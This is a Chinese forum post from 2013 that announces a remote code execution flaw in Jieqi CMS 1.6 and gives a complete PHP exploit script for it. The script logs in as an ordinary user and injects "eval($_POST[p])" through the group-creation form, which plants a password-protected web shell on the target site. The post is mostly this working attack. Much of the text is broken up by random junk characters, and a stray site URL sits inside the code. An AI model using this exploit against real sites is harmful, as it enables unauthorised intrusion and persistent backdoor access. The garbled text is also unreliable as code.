杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
; [* D0 f0 v; Y: Y% i
4 K& j+ k2 d- E/ E$ v6 {& v/ R 5 b- `2 r$ h2 e! U
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
' D& ?/ q) q6 W2 f 需要有一个能创建圈子的用户。
& }9 Y. ?" e3 j4 e
- i$ C; T1 j6 ]& N( C) C( M- j<?php* f" v! _# E& Q/ z. l0 i) E
! G6 E2 ?1 `2 J1 `" d z
print_r('
( p6 M9 g- _2 }- ~2 a4 f+---------------------------------------------------------------------------+
/ K, k0 A% p! o J' S9 VJieqi CMS V1.6 PHP Code Injection Exploit
2 |8 w: s4 x( L: `! iby flyh4t
9 w/ x. o% V6 `1 v" f: R! email: phpsec at hotmail dot com& y7 T/ u. m( ?0 o% S p
team: http://www.wolvez.org
$ ~ S' S9 ?& Z) a2 }) B. u- n0 q+---------------------------------------------------------------------------+
! ~! B' p% ~8 G; v2 p6 o: d'); /**# E" _7 b3 A( T8 V8 S
* works regardless of php.ini settings. g' I3 d5 Q8 r# Y. }/ w+ O
*/ if ($argc < 5) { print_r('+ e o! z {+ A
+---------------------------------------------------------------------------+
* t0 ~3 e4 F: _; EUsage: php '.$argv[0].' host path username
/ F" A/ h$ R' P7 \' [host: target server (ip/hostname)
' J- \4 V& U& V0 Ppath: path to jieqicms
) C. F( {0 M+ t! {0 u, tuasename: a username who can create group
# d) {. c0 O% s. ^8 R% ~Example:
' A* I& ~ K+ A% j8 V" mphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password, Y5 y9 K8 f% k$ Y! Z
+---------------------------------------------------------------------------+! [7 N* v( { o- `7 q6 l$ ?
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------232811682799614 m& I0 [0 V% {7 \- X$ f# Y" c/ S
Content-Disposition: form-data; name="gname"' g0 y( t* {; M% x) _4 B
! T' t" b9 E" n5 {'; $params .="';"; $params .='eval($_POST[p]);//flyh4t: d1 L- m S s* N$ g. p# i0 d2 w
-----------------------------23281168279961
" S. M) G+ `3 E3 t; w0 ^9 _9 OContent-Disposition: form-data; name="gcatid"( v, t, e4 G7 e( T
9 b/ k5 ]5 k: z2 S" U" K* q1. @. W0 j' u/ `9 A
-----------------------------23281168279961! U* O& v. g+ i4 M) e( V( p
Content-Disposition: form-data; name="gaudit"- m8 G' @5 ]; ^) c9 e
: i" K' u! q z
14 c; {' N5 W, W
-----------------------------23281168279961
5 F- r1 \/ T- WContent-Disposition: form-data; name="gbrief"
8 A4 D+ O$ k- E8 F, Y. {6 A
2 x3 `2 C& M, W% t4 y1
; z: a6 {3 M/ x2 `1 I, ^- L2 r-----------------------------23281168279961--
1 I8 T! N# z' v: |. ]4 |; e9 O; l'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
: s4 B: \- ?" k( H/ G6 E8 H
9 p$ ~' Q6 t8 Y! |' O! ^" Y* wpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对